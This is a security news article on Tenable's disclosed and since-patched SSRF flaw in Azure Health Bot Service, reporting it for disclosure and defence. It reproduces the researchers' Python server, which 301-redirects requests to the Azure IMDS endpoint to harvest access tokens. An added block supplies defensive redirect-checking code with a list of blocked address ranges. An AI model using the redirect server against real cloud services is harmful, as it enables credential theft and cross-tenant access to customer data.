Critical SSRF Vulnerability in Microsoft Azure Let Hackers Compromise Health Bot Services

by Esmeralda McKenzie
SSRF Vulnerability in Microsoft's Azure

Tenable Research has uncovered major security vulnerabilities in Microsoft's Azure Health Bot Service, a cloud platform designed to enable healthcare professionals to deploy AI-powered virtual health assistants.

The Azure AI Health Bot Service is a cloud-based platform designed for healthcare organizations. It allows developers to build and deploy AI-driven virtual health assistants, which help streamline processes and cut costs while ensuring compliance with industry standards.

These vulnerabilities allowed unauthorized access to cross-tenant resources, raising concerns about possible lateral movement to other resources within the service.

Tenable's investigation focused on a feature called "Data Connections," which allows the Azure Health Bot Service to interact with external data sources. While testing these data connections, researchers discovered a server-side request forgery (SSRF) vulnerability.

This vulnerability enabled them to bypass common security filters and access sensitive internal endpoints, such as Azure's Internal Metadata Service (IMDS).

Technical Analysis

The SSRF vulnerability was exploited by configuring a data connection to redirect requests to an external host controlled by the attackers.

The host was set up to respond with a 301 redirect to the IMDS endpoint, allowing the researchers to obtain a valid metadata response. Using this response, they obtained an access token for management.azure.com and subsequently listed subscriptions and resources belonging to other customers.

The Tenable researchers used a Python script to set up the HTTP server that facilitated the SSRF attack:

#!/usr/bin/python3
from http.server import HTTPServer, BaseHTTPRequestHandler


def servePage(s, hverb):
    # Pose as an IIS server and answer every request with a 301 whose
    # Location header points at the Azure IMDS endpoint.
    s.protocol_version = 'HTTP/1.1'
    s.server_version = 'Microsoft-IIS/8.5'
    s.sys_version = ''
    s.send_response(301)
    s.send_header('Location', 'http://169.254.169.254/metadata/instance?api-version=2021-12-13')
    # HTTP/1.1 with keep-alive needs an explicit length, otherwise the client may wait for a body
    s.send_header('Content-Length', '0')
    s.end_headers()
    message = ""
    s.wfile.write(bytes(message, "utf8"))
    return


class StaticServer(BaseHTTPRequestHandler):
    def do_GET(self):
        servePage(self, "GET")
        return


def main(server_class=HTTPServer, handler_class=StaticServer, port=80):
    # Listen on all interfaces; port 80 requires elevated privileges
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    httpd.serve_forever()


if __name__ == "__main__":
    main()

By configuring a data connection within the service's scenario editor, attackers could specify an external host under their control.

This host was configured to respond to requests with a 301 redirect destined for Azure's IMDS. Using this approach, attackers could obtain a valid metadata response and subsequently obtain an access token for management.azure.com.
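The defensive counterpart to the redirect trick described above, as an added example that is not code from Tenable or Microsoft: an outbound fetcher for a data-connection URL that validates every hop of a redirect chain against non-routable ranges (including 169.254.0.0/16, which contains the IMDS address), so a 301 from an external host back into IMDS is refused instead of followed. The `send` callable and the resolver are injected so the logic runs offline; in production, `send` would wrap an HTTP client configured not to follow redirects on its own.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

# Ranges an outbound fetcher must never reach. 169.254.0.0/16 covers the Azure IMDS
# address (169.254.169.254) that the 301 redirect in the article pointed at.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12",
    "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fe80::/10", "fc00::/7", "ff00::/8")]
REDIRECT_CODES = {301, 302, 303, 307, 308}

def is_blocked_ip(ip_text):
    ip = ipaddress.ip_address(ip_text)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:169.254.169.254 is still IMDS
    return any(ip in net for net in BLOCKED_NETWORKS)

def resolve(host):
    """Every A/AAAA record for host (empty set on failure); the default resolver."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(host, None)}
    except socket.gaierror:
        return set()

def destination_allowed(url, resolver=resolve):
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        addrs = {str(ipaddress.ip_address(parsed.hostname))}  # literal IP in the URL
    except ValueError:
        addrs = resolver(parsed.hostname)  # hostname: every resolved address must pass
    return bool(addrs) and not any(is_blocked_ip(a) for a in addrs)

def guarded_fetch(url, send, resolver=resolve, max_redirects=3):
    """send(url) -> (status, headers, body) and must not follow redirects itself.
    Each hop, including every redirect target, is validated before it is requested."""
    for _ in range(max_redirects + 1):
        if not destination_allowed(url, resolver):
            raise PermissionError(f"blocked destination: {url}")
        status, headers, body = send(url)
        location = headers.get("Location")
        if status in REDIRECT_CODES and location:
            url = urljoin(url, location)
            continue
        return status, body
    raise PermissionError("too many redirects")
```

Checking only the first URL is exactly what the 301 bypass defeats; the check has to run again on each Location header, and on every address a hostname resolves to.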

Response and Mitigation

Upon discovering the vulnerabilities, Tenable promptly reported them to Microsoft's Security Response Center (MSRC) on June 17, 2024. MSRC quickly acknowledged the issue and began implementing fixes.

By July 2, Microsoft confirmed that all affected services and regions had been patched, with no customer action required.

Tenable later identified another vulnerable endpoint for validating FHIR endpoints' data connections. Although this endpoint was susceptible to a similar attack, it did not allow cross-tenant access. This second issue was reported on July 9, with fixes completed by July 12.

These vulnerabilities underscore the importance of robust web application and cloud security mechanisms, even in AI-powered services.

While no evidence suggests that malicious actors exploited these vulnerabilities, the incident highlights the need for continuous security auditing and proactive vulnerability management.

Source credit : cybersecuritynews.com